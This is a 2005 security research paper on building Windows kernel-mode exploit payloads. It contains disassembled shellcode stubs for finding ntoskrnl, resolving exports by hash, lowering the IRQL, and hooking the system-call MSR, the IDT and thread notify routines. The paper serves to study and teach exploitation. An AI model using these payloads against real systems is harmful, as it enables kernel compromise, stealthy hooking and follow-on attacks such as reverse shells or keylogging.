Windows Kernel-mode Payload Fundamentals
bugcheck & skape
Dec 12, 2005

1) Foreword

Abstract: This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the realm of a few, but it is hoped that documents such as this one will encourage a thoughtful progression of the subject matter. To that point, this paper will describe some of the general techniques and algorithms that may be useful when implementing kernel-mode payloads. Furthermore, the anatomy of a kernel-mode payload will be broken down into four distinct units, known as payload components, and explained in detail. In the end, the reader should walk away with a concrete understanding of the way in which kernel-mode payloads operate on Windows.

Thanks: The authors would like to thank Barnaby Jack and Derek Soeder from eEye for their great paper on ring 0 payloads. Thanks also go out to jt, spoonm, vax, and everyone at nologin.

Disclaimer: The subject matter discussed in this document is presented in the interest of education. The authors cannot be held responsible for how the information is used. While the authors have tried to be as thorough as possible in their analysis, it is possible that they have made one or more mistakes. If a mistake is observed, please contact one or both of the authors so that it can be corrected.

Notes: In most cases, testing was performed on Windows 2000 SP4 and Windows XP SP0. Compatibility with other operating system versions, such as XP SP2, was inferred by analyzing structure offsets and disassemblies. It is theorized that many of the implementations described in this document are also compatible with Windows 2003 Server SP0/SP1, but due to lack of a functional 2003 installation, testing could not be performed.
2) Introduction

The subject of exploiting user-mode vulnerabilities and the payloads required to take advantage of them is something that has been discussed at length over the course of the past few years. With this realization finally starting to set in, security vendors have begun implementing security products that are designed to prevent the exploitation of user-mode vulnerabilities through a number of different techniques. There is a shift afoot, however, and it has to do with attacker focus being shifted from user-mode vulnerabilities toward the realm of kernel-mode vulnerabilities. The reasons for this shift are due in part to the inherent value of a kernel-mode vulnerability and to the relatively unexplored nature of kernel-mode vulnerabilities, which is something that most researchers find hard to resist.

To help aid in the shift from user-mode to kernel-mode, this paper will explore and extend the topic of kernel-mode payloads on Windows. Kernel-mode payloads are important because they are the method of actually doing something meaningful with a kernel-mode vulnerability. Without a payload, the ability to control code execution means nothing more than having the ability to cause a denial of service. Barnaby Jack and Derek Soeder from eEye have done a great job in kicking off the public research into this area.

Just like user-mode payloads on Windows, kernel-mode payloads can be broken down into general techniques and algorithms that are applicable to most payloads. These techniques and algorithms will be discussed in chapter 3. Furthermore, both user-mode and kernel-mode payloads can be broken down into a set of payload components that can be combined together to form a single logical payload. A payload component is simply defined as an autonomous unit of a payload that has a specific purpose.
For instance, both user-mode and kernel-mode payloads have an optional component called a stager that can be used to execute a second logical payload component known as a stage. One major distinction between kernel-mode and user-mode payloads, however, is that kernel-mode payloads are burdened with some extra considerations that are not found in user-mode payloads, and for that reason are broken down into a few more distinct payload components. These extra components will be discussed at length in chapter 4.

The purpose of this document is to provide the reader with a point of reference for the major aspects common to nearly all kernel-mode payloads. To simplify terminology, kernel-mode payloads will be referred to throughout the document as R0 payloads, short for ring 0, which symbolizes the processor ring that kernel-mode operates at on x86. For the same reason, user-mode payloads will be referred to throughout the document as R3 payloads, short for ring 3. To fully understand this paper, the reader should have a basic understanding of Windows kernel-mode programming.

In order to limit the scope of this document, the methods that can be used to achieve code execution through different vulnerability scenarios will not be discussed at length. The main reason for this is that general approaches to payload implementation are typically independent of the vulnerability for which they are used. However, references to some of the research in this area can be found in the bibliography for readers who might be curious. Furthermore, this document will not expand upon some of the interesting things that can be done in the context of a kernel-mode payload, such as keyboard sniffing. Instead, the topic of advanced kernel-mode payloads will be left for future research. The authors hope that by describing the various elements that will compose nearly all kernel-mode payloads, the process involved in implementing some of the more interesting parts will be made easier.
With all of the formalities out of the way, the first leap to take is one regarding an understanding of some of the general techniques that can be applied to kernel-mode payloads, and it's there that the journey begins.

3) General Techniques

This chapter will outline some of the techniques and algorithms that are generally applicable to most kernel-mode payloads. For example, kernel-mode payloads may find it necessary to resolve certain exported symbols for use within the payload itself, much the same as user-mode payloads do.

3.1) Finding Ntoskrnl.exe Base Address

One of the prerequisites to nearly all user-mode payloads on Windows is a stub that is responsible for locating the base address of kernel32.dll. In kernel-mode, the logical equivalent to kernel32.dll is ntoskrnl.exe, also known more succinctly as nt. The purpose of nt is to implement the heart of the kernel itself and to provide the core library interface to device drivers. For that reason, a lot of the routines that are exported by nt may be of use to kernel-mode payloads. This makes locating the base address of nt important because it is what facilitates the resolving of exported symbols. This section will describe a few techniques that can be used to locate the base address of nt.

One general technique that is taken to find the base address of nt is to reliably locate a pointer that exists somewhere within the memory mapping for nt and to scan down toward lower addresses until the MZ signature is found. This technique will be referred to as a scandown technique since it involves scanning downward toward lower addresses. This is completely synonymous with the mid-delta term used by eEye, but clarified to indicate a direction. In the implementations provided below, each makes use of an optimization to walk down in PAGE_SIZE decrements. However, this also adds four bytes to the amount of space taken up by the stub.
If size is a concern, walking down byte-by-byte as is done in the eEye paper can be a great way to save space. Another thing to keep in mind with some of these implementations is that they may fail if the /3GB boot flag is specified. This is not generally very common, but it could be something that is encountered in the real world.

3.1.1) IDT Scandown

+---------+----------+
| Size:   | 17 bytes |
| Compat: | All      |
| Credit: | eEye     |
+---------+----------+

The approach for finding the base address of nt discussed in eEye's paper involved finding the high-order word of an IDT handler that was set to a symbol somewhere inside nt. After acquiring the symbol address, the payload simply walked down toward lower addresses in memory byte-by-byte until it found the MZ signature. The following disassembly shows the approach taken to do this:

00000000  8B3538F0DFFF      mov esi,[0xffdff038]
00000006  AD                lodsd
00000007  AD                lodsd
00000008  48                dec eax
00000009  81384D5A9000      cmp dword [eax],0x905a4d
0000000F  75F7              jnz 0x8

This approach is perfectly fine; however, it could be prone to error if the four signature bytes were found somewhere within nt at a location that did not actually coincide with its base address. This issue is present in any scandown technique (referred to as "mid-deltas" by eEye). Scanning down byte-by-byte can be seen as potentially more error prone, but this is purely conjecture at this point as the authors are aware of no specific cases in which it would fail. It may also fail if the direction flag is not cleared, though the chances of this happening are minimal. One other limiting factor may be the presence of the NULL byte in the comparison.
It is possible to slightly improve this approach (depending upon the perspective from which one looks at it) by scanning downward one page at a time and by eliminating the need to clear the direction flag. (It is not possible to walk downward in 16-page decrements because 16-page alignment is not guaranteed universally in kernel-mode.) This also eliminates the presence of NULL bytes. However, some of these changes lead to the code being slightly larger (21 bytes total):

00000000  6A38              push byte +0x38
00000002  5B                pop ebx
00000003  648B03            mov eax,[fs:ebx]
00000006  8B4004            mov eax,[eax+0x4]
00000009  662501F0          and ax,0xf001
0000000D  48                dec eax
0000000E  6681384D5A        cmp word [eax],0x5a4d
00000013  75F4              jnz 0x9

3.1.2) KPRCB IdleThread Scandown

+---------+----------+
| Size:   | 17 bytes |
| Compat: | All      |
+---------+----------+

The base address of nt can also be found by looking at the IdleThread attribute of the KPRCB for the current KPCR. As it stands, this attribute always appears to point to a global variable inside of nt. Just like the IDT scandown approach, this technique uses the symbol as a starting point to walk down and find the base address of nt by looking for the MZ signature. The following disassembly shows how this is accomplished:

00000000  A12CF1DFFF        mov eax,[0xffdff12c]
00000005  662501F0          and ax,0xf001
00000009  48                dec eax
0000000A  6681384D5A        cmp word [eax],0x5a4d
0000000F  75F4              jnz 0x5

This approach will fail if it happens that the IdleThread attribute does not point somewhere within nt, but thus far a scenario such as this has not been observed. It would also fail if the Kprcb attribute was not found immediately after the Kpcr, but this has not been observed in testing.
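The page-wise loop shared by these stubs (and ax,0xf001 / dec eax / cmp word [eax],0x5a4d / jnz) can be modeled outside of the kernel to see which addresses it actually probes. The following Python sketch is only a simulation under stated assumptions: the read_word callback, the starting pointer, and the image base are all hypothetical stand-ins for real kernel memory, and the max_steps guard exists only so the model cannot loop forever.

```python
MZ = 0x5A4D  # the bytes 'M','Z' read as a little-endian 16-bit word


def scandown(start, read_word, max_steps=1 << 20):
    """Model of: and ax,0xf001 / dec eax / cmp word [eax],0x5a4d / jnz.

    read_word is a hypothetical stand-in for a 16-bit memory read.
    Returns (address where MZ matched, list of every probed address).
    """
    eax = start & 0xFFFFFFFF
    probed = []
    for _ in range(max_steps):
        # and ax,0xf001 modifies only the low 16 bits of eax
        eax = (eax & 0xFFFF0000) | (eax & 0xF001)
        # dec eax is a full 32-bit decrement
        eax = (eax - 1) & 0xFFFFFFFF
        probed.append(eax)
        if read_word(eax) == MZ:
            return eax, probed
    raise RuntimeError("signature not found within max_steps")


if __name__ == "__main__":
    base = 0x804D0000  # illustrative image base, not a measured value

    def fake_memory(addr):
        # Pretend only the image base holds the MZ signature.
        return MZ if addr == base else 0

    found, probed = scandown(0x804E3B25, fake_memory)
    print(hex(found), [hex(a) for a in probed[:4]])
```

In this model the probes alternate between a page-aligned address and the last byte of the page below it, so a page boundary is tested on every second iteration. Masking with 0xf001 instead of 0xf000 is what keeps a zero byte out of the encoded and instruction (66 25 01 F0).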
3.1.3) SYSENTER_EIP_MSR Scandown

+---------+-----------------------------------+
| Size:   | 19 bytes                          |
| Compat: | XP, 2003 (modern processors only) |
+---------+-----------------------------------+

For processors that support the system call MSR 0x176 (SYSENTER_EIP_MSR), the base address of nt can be found by reading the registered system call handler and then using the scandown technique to find the base address. The following disassembly illustrates how this can be accomplished:

00000000  6A76              push byte +0x76
00000002  59                pop ecx
00000003  FEC5              inc ch
00000005  0F32              rdmsr
00000007  662501F0          and ax,0xf001
0000000B  48                dec eax
0000000C  6681384D5A        cmp word [eax],0x5a4d
00000011  75F4              jnz 0x7

3.1.4) Known Portable Base Scandown

+---------+--------------------+
| Size:   | 17 bytes           |
| Compat: | 2000, XP, 2003 SP0 |
+---------+--------------------+

A quick sampling of base addresses across different major releases shows that the base address of nt is always within a certain range. The one exception to this in the polling was Windows 2003 Server SP1, and for that reason this payload is not compatible with it. The basic idea is to simply use an offset that is known to reside within the region that nt will be mapped at on different operating system versions. The table below describes the mapping ranges for nt on a few different samplings:

+------------------+--------------+-------------+
| Platform         | Base Address | End Address |
+------------------+--------------+-------------+
| Windows 2000 SP4 | 0x80400000   | 0x805a3a00  |
| Windows XP SP0   | 0x804d0000   | 0x806b3f00  |
| Windows XP SP2   | 0x804d7000   | 0x806eb780  |
| Windows 2003 SP1 | 0x80800000   | 0x80a6b000  |
+------------------+--------------+-------------+

As can be seen from the table, the address 0x8050babe resides within every region that nt could be mapped at except for Windows 2003 Server SP1.
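The claim about 0x8050babe can be checked mechanically against the sampled ranges. The sketch below simply encodes the table as data; the helper names platforms_covering and common_window are made up for this illustration, and the ranges are only the four samplings listed in the table, not an exhaustive survey.

```python
# Mapping ranges copied from the table: platform -> (base, end).
NT_RANGES = {
    "Windows 2000 SP4": (0x80400000, 0x805A3A00),
    "Windows XP SP0": (0x804D0000, 0x806B3F00),
    "Windows XP SP2": (0x804D7000, 0x806EB780),
    "Windows 2003 SP1": (0x80800000, 0x80A6B000),
}


def platforms_covering(addr):
    """Return the sampled platforms whose nt mapping contains addr."""
    return [name for name, (base, end) in NT_RANGES.items()
            if base <= addr < end]


def common_window(names):
    """Intersect the mapping ranges of the named platforms.

    Returns (low, high) for the shared window, or None if the
    ranges do not overlap at all.
    """
    low = max(NT_RANGES[name][0] for name in names)
    high = min(NT_RANGES[name][1] for name in names)
    return (low, high) if low < high else None


if __name__ == "__main__":
    print(platforms_covering(0x8050BABE))
    window = common_window(["Windows 2000 SP4", "Windows XP SP0", "Windows XP SP2"])
    print([hex(v) for v in window])
    print(common_window(list(NT_RANGES)))
```

Under these samplings, any starting value between 0x804d7000 and 0x805a3a00 would serve equally well for 2000 and XP, while no single address falls inside all four ranges.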
The payload below implements this approach:

00000000  B8BEBA5080        mov eax,0x8050babe
00000005  662501F0          and ax,0xf001
00000009  48                dec eax
0000000A  6681384D5A        cmp word [eax],0x5a4d
0000000F  75F4              jnz 0x5

3.2) Resolving Symbols

+---------+----------+
| Size:   | 67 bytes |
| Compat: | All      |
+---------+----------+

Another aspect common to almost all payloads on Windows is the use of code that walks the export directory of an image to resolve the address of a symbol. (The technique of walking the export directory to resolve symbols has been used for ages, so don't take the example here to be the first ever use of it.) In the kernel, things aren't much different. Barnaby refers to the use of a two-byte XOR/ROR hash in the eEye paper. Alternatively, a four-byte hash could be used, but as pointed out in the eEye paper, this leads to a waste of space when a two-byte hash could suffice equally well provided there are no collisions.

The approach implemented below involves passing a two-byte hash in the ebx register (the high-order bytes do not matter) and the base address of the image to resolve against in the ebp register. In order to save space, the code below is designed in such a way that it will transfer execution into the function after it resolves it, thus making it possible to resolve and call the function in one step without having to cache addresses. In most cases, this leads to a size efficiency increase.
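The value placed in bx can be computed offline. The following is a minimal Python sketch, assuming the hash is exactly the loop used by the resolution routine (lodsb / ror edx,0xd / add edx,eax, repeated until the NULL terminator has also been processed). The function names are hypothetical; the only value taken from the paper is the ExAllocatePool result of 0x0311b83f, which this model reproduces.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def export_hash(name):
    """32-bit rotate-and-add hash over name plus its NULL terminator."""
    edx = 0
    for byte in name.encode("ascii") + b"\x00":
        edx = ror32(edx, 13)             # ror edx,0xd
        edx = (edx + byte) & 0xFFFFFFFF  # add edx,eax (eax holds one byte)
    return edx


def two_byte_hash(name):
    """Only the low word is compared by the routine (cmp dx,bx)."""
    return export_hash(name) & 0xFFFF


def find_collisions(names):
    """Group names that share a two-byte hash; empty dict if none do."""
    groups = {}
    for name in names:
        groups.setdefault(two_byte_hash(name), []).append(name)
    return {h: group for h, group in groups.items() if len(group) > 1}


if __name__ == "__main__":
    print("%.8x" % export_hash("ExAllocatePool"))
    print("%.4x" % two_byte_hash("ExAllocatePool"))
```

Because the terminator is hashed as well, the result equals the plain rotate-and-add hash of the name rotated right by a further 13 bits. A helper such as find_collisions could be run over the export names of a target image to confirm that the two-byte form is unambiguous for the symbols a payload needs.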
00000000  60                pusha
00000001  31C9              xor ecx,ecx
00000003  8B7D3C            mov edi,[ebp+0x3c]
00000006  8B7C3D78          mov edi,[ebp+edi+0x78]
0000000A  01EF              add edi,ebp
0000000C  8B5720            mov edx,[edi+0x20]
0000000F  01EA              add edx,ebp
00000011  8B348A            mov esi,[edx+ecx*4]
00000014  01EE              add esi,ebp
00000016  31C0              xor eax,eax
00000018  99                cdq
00000019  AC                lodsb
0000001A  C1CA0D            ror edx,0xd
0000001D  01C2              add edx,eax
0000001F  84C0              test al,al
00000021  75F6              jnz 0x19
00000023  41                inc ecx
00000024  6639DA            cmp dx,bx
00000027  75E3              jnz 0xc
00000029  49                dec ecx
0000002A  8B5F24            mov ebx,[edi+0x24]
0000002D  01EB              add ebx,ebp
0000002F  668B0C4B          mov cx,[ebx+ecx*2]
00000033  8B5F1C            mov ebx,[edi+0x1c]
00000036  01EB              add ebx,ebp
00000038  8B048B            mov eax,[ebx+ecx*4]
0000003B  01E8              add eax,ebp
0000003D  8944241C          mov [esp+0x1c],eax
00000041  61                popa
00000042  FFE0              jmp eax

To understand how this function works, take for example the resolution of nt!ExAllocatePool. First, a hash of the string "ExAllocatePool" must be obtained using the same algorithm that the payload uses. For this payload, the result is 0x0311b83f. (This was calculated by doing perl -Ilib -MPex::Utils -e "printf .8x, Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);".) Since the implementation uses a two-byte hash, only 0xb83f is needed. This hash is then stored in the bx register. Since ExAllocatePool is found within nt, the base address of nt must be passed in the ebp register. Finally, in order to perform the resolution, the arguments to nt!ExAllocatePool must be pushed onto the stack prior to calling the resolution routine. This is because the resolution routine will transfer control into nt!ExAllocatePool after the resolution succeeds and therefore must have the proper arguments on the stack.

One downside to this implementation is that it won't support the resolution of data exports (since it tries to jump into them).
However, for such a purpose, the routine could be modified to simply not issue the jmp instruction and instead rely on the caller to execute it. It is also important for payloads that use this resolution technique to clear the direction flag with cld.

4) Payload Components

This chapter will outline four distinct components that can be used in conjunction with one another to produce a logical kernel-mode payload. Unlike user-mode vulnerabilities, kernel-mode vulnerabilities tend to be a bit more involved when it comes to considerations that must be made when attempting to execute code after successfully exploiting a target. These concerns include things like IRQL considerations, setting up code for execution, gracefully continuing execution, and what action to actually perform. Some of these steps have parallels to user-mode payloads, but others do not.

The first consideration that must be made when implementing a kernel-mode payload is whether or not the IRQL that the payload will be running at is a concern. For instance, if the payload will be making use of functions that require the processor to be running at PASSIVE_LEVEL, then it may be necessary to ensure that the processor is transitioned to a safe IRQL. Whether or not the IRQL will even be a problem also depends on the vulnerability in question. For scenarios where it is a problem, a migration payload component can be used to ensure that the code that requires a specific IRQL is executed in a safe manner.

The second consideration involves staging either an R3 payload or a secondary R0 payload to another location for execution. This payload component is encapsulated by a stager which has parallels to payload stagers found in typical user-mode payloads. Unlike user-mode payloads, though, kernel-mode stagers are typically designed to execute code in another context, such as in a user-mode process or in another kernel-mode thread context.
As such, stagers may sometimes overlap with the purpose of the migration component, such as when the act of staging leads to the stage executing at a safe IRQL, and can therefore be considered a superset of a migration component in that case.

The third consideration has to do with how the payload gracefully restores execution after it has completed. This portion of a kernel-mode payload is classified as the recovery component. In short, the recovery component of a payload finds a way to make sure that the kernel does not crash or otherwise become unusable. If the kernel were to crash, any code that the payload had intended to execute may not actually get a chance to run depending on how the payload is structured. As such, recovery is one of the most volatile and critical aspects of a kernel-mode payload.

Finally, and most importantly, the fourth component of a kernel-mode payload is the stage component. It is this component that actually performs the real work of the payload. For instance, a stage component might detect that it's running in the context of lsass.exe and create a reverse shell in user-mode. As another example of a stage component, eEye demonstrated a keyboard hook that sent keystrokes back in ICMP echo responses from the host. Stages have a very broad definition.

The following sections will explain each one of the four payload components in detail and offer techniques and implementations that can be used under certain situations.

4.1) Migration

One of the things that is different about kernel-mode vulnerabilities in relation to user-mode vulnerabilities is that the Windows kernel operates internally at specific Interrupt Request Levels, also known as IRQLs. The purpose of IRQLs is to allow the kernel to mask off interrupts that occur at a lower level than the one that the processor is currently executing at. This ensures that a piece of code will run uninterrupted by threads and hardware/software interrupts that have a lesser priority.
It also allows the kernel to define a driver model that ensures that certain operations are not performed at critical processor IRQLs. For instance, it is not permitted to block at any IRQL greater than or equal to DISPATCH_LEVEL. It is also not permitted to reference pageable memory that has been paged out while at an IRQL greater than or equal to DISPATCH_LEVEL.

The reason this is important is because the IRQL that the processor will be running at when a kernel-mode vulnerability is triggered is highly dependent upon the area in which the vulnerability occurs. For this reason, it may be generally necessary to have an approach for either directly or indirectly lowering the IRQL in such a way that permits the use of some of the common driver support routines. As an example, it is not possible to call nt!KeInsertQueueApc at an IRQL greater than PASSIVE_LEVEL.

This section will focus on describing methods that could be used to implement migration payloads. The purpose of a migration payload is to migrate the processor to an IRQL that will allow payloads to make use of pageable memory and common driver support routines as described above. The techniques that can be used to do this vary in terms of stability and simplicity. It's generally a matter of picking the right one for the job.

4.1.1) Direct IRQL Adjustment

+---------+------------------+
| Type:   | R0 IRQL Migrator |
| Size:   | 6 bytes          |
| Compat: | All              |
+---------+------------------+

One of the most straightforward approaches that can be taken to migrate a payload to a safe IRQL is to directly lower a processor's IRQL. This approach was first proposed by eEye and involved resolving and calling hal!KeLowerIrql with the desired IRQL, such as PASSIVE_LEVEL. This technique is very dangerous due to the way in which IRQLs are intended to be used. The direct lowering of an IRQL can lead to machine deadlocks and crashes due to unsafe assumptions about locks being held, among other things.
An optimization to the hal!KeLowerIrql technique is to perform the operation that hal!KeLowerIrql actually performs. Specifically, hal!KeLowerIrql is a simple wrapper for hal!KfLowerIrql which adjusts the Irql attribute of the KPCR structure for a specific processor to the supplied IRQL (as well as calling software interrupt handlers for masked IRQLs). To implement a payload that migrates to a safe IRQL, all that is required is to adjust the value at fs:0x24, such as by lowering it to PASSIVE_LEVEL as shown below. (In kernel-mode, the fs segment points to the current processor's KPCR structure.)

00000000  31C0              xor eax,eax
00000002  64894024          mov [fs:eax+0x24],eax

One concern about taking this approach over calling hal!KeLowerIrql is that the soft-interrupt handlers associated with interrupts that were masked while at a raised IRQL will not be called. It is unclear whether or not this could lead to a deadlock, but it is theorized that the answer could be yes. However, the authors did test writing a driver that raised to HIGH_LEVEL, spun for a period of time (during which kb/mouse interrupts were sent), and then manually adjusted the IRQL as described above. There appeared to be no adverse side effects, but it has not been ruled out that a deadlock could be possible. Consequently, if anyone knows a definitive answer to this, the authors would love to hear it.

Aside from the risks, this approach is nice because it is very small (6 bytes), so assuming there are no significant problems with it, the use of this method would be a no-brainer given the right set of circumstances for a vulnerability.

4.1.2) System Call MSR/IDT Hooking

+---------+------------------+
| Type:   | R0 IRQL Migrator |
| Size:   | 97 bytes         |
| Compat: | All              |
+---------+------------------+

One relatively simple way of migrating an R0 payload to a safe IRQL is by hooking the function used to dispatch system calls in kernel-mode through the use of a processor model-specific register.
In newer processors, system calls are dispatched through an improved interface that takes advantage of a registered function pointer that is given control when a system call is dispatched. The function pointer is stored within the SYSENTER_EIP_MSR model-specific register that has a symbolic code of 0x176.

To take advantage of this on Windows XP+ for the purpose of payload migration, all that is required is to first read the current state of the MSR so that the original system call dispatcher routine can be preserved. After that, the second stage of the R0 payload must be copied to another location, preferably globally accessible and unused, such as SharedUserData or the KPRCB. Once the second stage has been copied, the value of the MSR can be changed to point to the first instruction of the now-copied stage. The end result is that whenever a system call is dispatched from user-mode, the second stage of the R0 payload will be executed at IRQL = PASSIVE_LEVEL.

For Windows 2000, and for versions of Windows XP+ running on older hardware, another approach is required that is virtually equivalent. Instead of changing the processor MSR, the IDT entry for the 0x2e soft-interrupt that is used to dispatch system calls must be hooked so that whenever the soft-interrupt is triggered the migrated R0 payload is called. The steps taken to copy the second stage to another location are the same as they would be under the MSR approach.

The following steps outline one way in which a stager of this type could be implemented for Windows 2000 and Windows XP.

1. Determining which system call vector to hook

If KUSER_SHARED_DATA.NtMinorVersion, located at 0xffdf0270, has a value of 0, it is safe to assume that the IDT will need to be hooked since the syscall/sysenter instructions are not used in Windows 2000. Otherwise, the hook should be installed in the MSR:0x176 register. Note, however, that it is possible Windows XP will not use this method under rare circumstances.
Also, NtMajorVersion is assumed to be 5.

2. Caching the existing service routine address

If the MSR register is to be hooked, the current value can be retrieved by placing the symbolic code of 0x176 in ecx and using the rdmsr instruction. The existing value will be returned in edx:eax. If the IDT entry at index 0x2e is to be hooked, it can be retrieved by first obtaining the processor's IDT base using the sidt instruction. The entry can then be located at offset 0x170 relative to the base since the IDT is an array of KIDTENTRY structures. Lastly, the address of the code that services the interrupt is stored in the KIDTENTRY with the low word at Offset and the high word at ExtendedOffset. The following is the definition of KIDTENTRY.

KIDTENTRY
   +0x000 Offset           : Uint2B
   +0x002 Selector         : Uint2B
   +0x004 Access           : Uint2B
   +0x006 ExtendedOffset   : Uint2B

3. Migrating the payload

A relatively safe place to migrate the payload to is the free space after the first processor's KPCR structure. An arbitrary value of 0xffdffd80 is used to cache the current service routine address, and the remainder of the payload is copied to 0xffdffd84 followed by an indirect jump to the original service routine using jmp [0xffdffd80]. Note that with this implementation a payload is responsible for preserving all registers before calling the original service routine. The payload also may not exceed the end of the memory page, thus limiting its size to 630 bytes. Historically, R0 shellcode has been put in the space after SharedUserData since it is exposed to all processes at R3. However, that could have its disadvantages if the payload has no requirement to be accessed from R3. The downside of the space after the KPCR is the smaller amount of free space available.

4. Hooking the service routine

The same methods that were used to cache the current service routine are used to hook it. For hooking the IDT, interrupts are temporarily disabled in order to overwrite the KIDTENTRY Offset and ExtendedOffset fields.
Disabling interrupts on the current processor will still be safe in multiprocessor environments since IDTs are maintained on a per-processor basis. For hooking the MSR, the new service routine address is placed in edx:eax (in this case 0x0:0xffdffd84), 0x176 is placed in ecx, and a wrmsr instruction is issued.

The following code illustrates an implementation of this type of staging payload. It's roughly 97 bytes in size, excluding the staged payload and the recovery method. Removing the support for hooking the IDT entry reduces the size to roughly 47 bytes.

00000000  FC                cld
00000001  BF80FDDFFF        mov edi,0xffdffd80
00000006  57                push edi
00000007  6A76              push byte +0x76
00000009  58                pop eax
0000000A  FEC4              inc ah
0000000C  99                cdq
0000000D  91                xchg eax,ecx
0000000E  89F8              mov eax,edi
00000010  66B87002          mov ax,0x270
00000014  3910              cmp [eax],edx
00000016  EB06              jmp short 0x1e
00000018  50                push eax
00000019  0F32              rdmsr
0000001B  AB                stosd
0000001C  EB3E              jmp short 0x5c
0000001E  648B4238          mov eax,[fs:edx+0x38]
00000022  8D4408FA          lea eax,[eax+ecx-0x6]
00000026  50                push eax
00000027  91                xchg eax,ecx
00000028  8B4104            mov eax,[ecx+0x4]
0000002B  668B01            mov ax,[ecx]
0000002E  AB                stosd
0000002F  EB2B              jmp short 0x5c
00000031  5E                pop esi
00000032  6A01              push byte +0x1
00000034  59                pop ecx
00000035  F3A5              rep movsd
00000037  B8FF2580FD        mov eax,0xfd8025ff
0000003C  AB                stosd
0000003D  66C707DFFF        mov word [edi],0xffdf
00000042  59                pop ecx
00000043  58                pop eax
00000044  0404              add al,0x4
00000046  85C9              test ecx,ecx
00000048  9C                pushf
00000049  FA                cli
0000004A  668901            mov [ecx],ax
0000004D  C1E810            shr eax,0x10
00000050  66894106          mov [ecx+0x6],ax
00000054  9D                popf
00000055  EB04              jmp short 0x5b
00000057  31D2              xor edx,edx
00000059  0F30              wrmsr
0000005B  C3                ret                 ; replace with recovery method
0000005C  E8D0FFFFFF        call 0x31

... R0 stage here ...
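Several of the constants used by this stager follow from simple arithmetic on the KIDTENTRY layout and the chosen storage address. The Python sketch below reproduces that arithmetic on plain byte strings; it does not touch a real IDT. The helper names and the sample entry values are hypothetical, and the page boundary of 0xffe00000 assumes 4 KB pages.

```python
import struct

KIDTENTRY_SIZE = 8        # four Uint2B fields: Offset, Selector, Access, ExtendedOffset
CACHE_SLOT = 0xFFDFFD80   # where the original service routine address is cached
STAGE_START = CACHE_SLOT + 4
PAGE_END = 0xFFE00000     # assumed end of the 4 KB page holding the KPCR

# FF 25 <addr32> encodes jmp [addr32]; the stager writes these six bytes
# with mov eax,0xfd8025ff / stosd / mov word [edi],0xffdf.
JMP_TO_ORIGINAL = struct.pack("<HI", 0x25FF, CACHE_SLOT)


def idt_entry_offset(vector):
    """Byte offset of an interrupt vector's entry from the IDT base."""
    return vector * KIDTENTRY_SIZE


def handler_address(entry):
    """Combine Offset (low word) and ExtendedOffset (high word)."""
    offset, _selector, _access, extended = struct.unpack("<HHHH", entry)
    return (extended << 16) | offset


def patch_entry(entry, new_handler):
    """Return a copy of entry whose handler address is new_handler."""
    _offset, selector, access, _extended = struct.unpack("<HHHH", entry)
    return struct.pack("<HHHH", new_handler & 0xFFFF, selector,
                       access, (new_handler >> 16) & 0xFFFF)


def max_stage_size():
    """Bytes left for the stage before the trailing jmp hits the page end."""
    return PAGE_END - STAGE_START - len(JMP_TO_ORIGINAL)


if __name__ == "__main__":
    sample = struct.pack("<HHHH", 0x1234, 0x0008, 0xEE00, 0x8053)  # made-up entry
    print(hex(idt_entry_offset(0x2E)), hex(handler_address(sample)))
    print(hex(handler_address(patch_entry(sample, STAGE_START))))
    print(JMP_TO_ORIGINAL.hex(), max_stage_size())
```

Under these assumptions the model arrives at the same figures quoted in the text: the 0x2e entry sits 0x170 bytes into the IDT, and 630 bytes remain for the stage once the cached pointer and the six-byte indirect jump are accounted for.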
4.1.3) Thread Notify Routine

+---------+------------------+
| Type:   | R0 IRQL Migrator |
| Size:   | 127 bytes        |
| Compat: | 2000, XP         |
+---------+------------------+

Another technique that can be used to migrate a payload to a safe IRQL involves setting up a thread notify routine which is normally done by calling nt!PsSetCreateThreadNotifyRoutine. Unfortunately, the documentation states that this routine can only be called at PASSIVE_LEVEL, thus making it appear as if calling it from a payload would lead to problems. While this is true, it is also possible to manually create a notify routine by modifying the global array of thread notify routines. Although this array is not exported, it is easy to find by extracting an address reference to it from one of either nt!PsSetCreateThreadNotifyRoutine or nt!PsRemoveCreateThreadNotifyRoutine. By using this basic approach, it is possible to write a migration payload that transitions to PASSIVE_LEVEL by registering a callback that is called whenever a thread is created or deleted.

In more detail, a few steps must be taken in order to get this to work properly on 2000 and XP. The steps taken on 2003 should be pretty much the same as XP, but have not been tested.

1. Find the base address of nt

The base address of nt must be located so that an exported symbol can be resolved.

2. Determine the current operating system

Since the method used to install the thread notify routines differs between 2000 and XP, a check must be made to see what operating system the payload is currently running on. This is done by checking the NtMinorVersion attribute of KUSER_SHARED_DATA at 0xffdf0270.

3. Shift edi to point to the storage buffer

Due to the fact that it can't be generally assumed that the buffer the payload is running from will stick around until the notify routine is called, the stage associated with the payload must be copied to another location. In this case, the payload is copied to a buffer starting at 0xffdf04e0.

4.
If the payload is running on XP

On XP, the technique used to register the thread notify routine requires creating a callback structure in a global location and manually inserting it into the nt!PspCreateThreadNotifyRoutine array. This has to be done in order to avoid IRQL issues. For that reason, a fake callback structure is created and is designed to be stored at 0xffdf04e0. The actual code that will be executed will be copied to 0xffdf04e8. The function pointer inside the callback structure is located at offset 0x4, but in the interest of size, both of the first attributes are initialized to point to 0xffdf04e8. It is also important to note that on XP, the nt!PspCreateThreadNotifyRoutineCount must be incremented so that the notify routine will actually be called. Fortunately, for versions of XP currently tested, this value is located 0x20 bytes after the notify routine array.

5. If the payload is running on 2000

On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of function pointers. For that reason, registering the notify routine is much simpler and can actually be done by calling nt!PsSetCreateThreadNotifyRoutine without much of a concern since no extra memory is allocated. By calling the real exported routine directly, it is not necessary to manually increment the nt!PspCreateThreadNotifyRoutineCount. Furthermore, doing so would not be as easy as it is on XP because the count variable is located quite a distance away from the array itself.

6. Resolve the exported symbol

The symbol resolution approach taken in this payload involves comparing part of an exported symbol's name with "dNot". This is done because on XP, the actual symbol needed in order to extract the address of nt!PspCreateThreadNotifyRoutine is found a few bytes into nt!PsRemoveCreateThreadNotifyRoutine. However, on 2000, the address of nt!PsSetCreateThreadNotifyRoutine needs to be resolved as it is going to be directly called.
